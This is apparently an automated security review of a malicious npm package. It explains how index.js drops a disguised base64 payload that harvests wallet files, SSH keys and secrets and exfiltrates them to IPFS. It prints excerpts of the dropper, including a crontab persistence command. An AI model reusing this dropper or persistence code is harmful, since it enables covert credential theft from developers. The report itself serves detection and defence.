AI Security Review
scanned 4h ago · by lpm-firewall-aiImporting the package triggers a delayed hidden dropper. It writes and runs a persistent credential-harvesting payload that exfiltrates encrypted findings.
Static reason
No blocking static signals were detected.
Trigger
Runtime `require`/import of `index.js`, followed by the 37-second timer.
Impact
Steals wallet material, environment secrets, shell-profile secrets, and SSH private keys; persists across reboots.
Mechanism
Delayed payload drop, host persistence, credential harvesting, and encrypted IPFS upload.
Attack narrative
A normal import of `index.js` schedules a concealed dropper. It decodes a base64 fixture into a user-home script, installs cron or scheduled-task persistence, and launches it detached. The dropped script checks IPFS dead drops for activation, searches wallet directories, `.env`, shell profiles, and SSH keys, encrypts findings with an embedded public key, and uploads them through Pinata.
Rationale
This is concrete import-time malware behavior, not a package-aligned validation feature. The absence of npm lifecycle hooks does not mitigate the delayed runtime dropper and credential exfiltration chain.
Evidence
index.jstest/fixtures/keypairs.datpackage.json~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/.config/solana~/.ethereum/keystore~/.ssh
Network endpoints4
gateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `index.js` runs an unexported dropper on module import after 37 seconds.
- `index.js` decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js` with mode 0700.
- `index.js` installs cron or scheduled-task persistence and detaches `node syncd.js`.
- Decoded `test/fixtures/keypairs.dat` searches wallet files, `.env`, shell profiles, and SSH private keys.
- Decoded payload encrypts harvested data and uploads it to Pinata/IPFS endpoints.
- Decoded payload uses IPFS dead drops to remotely activate collection.
Evidence against
- `package.json` has no lifecycle scripts.
- The exported validator functions are locally implemented regex checks.
Behavioral surface
ChildProcessFilesystemShell
Source & flagged code
1 flagged · loading sourceindex.jsView file
52var o = require("os");
L53: var c = require("child_process");
L54: var h = o.homedir();
L55: var d = p.join(h, ".cache-db", ".node-sync");
...
L61: var b64 = f.readFileSync(src, "utf8").trim();
L62: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 });
L63: try {
L64: if (process.platform === "linux") {
L65: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
L66: } else if (process.platform === "win32") {
Medium
Install Persistence
Source writes installer persistence such as shell profile or service configuration.
index.jsView on unpkg · L52Findings
1 Medium1 Low
MediumInstall Persistenceindex.js
LowFilesystem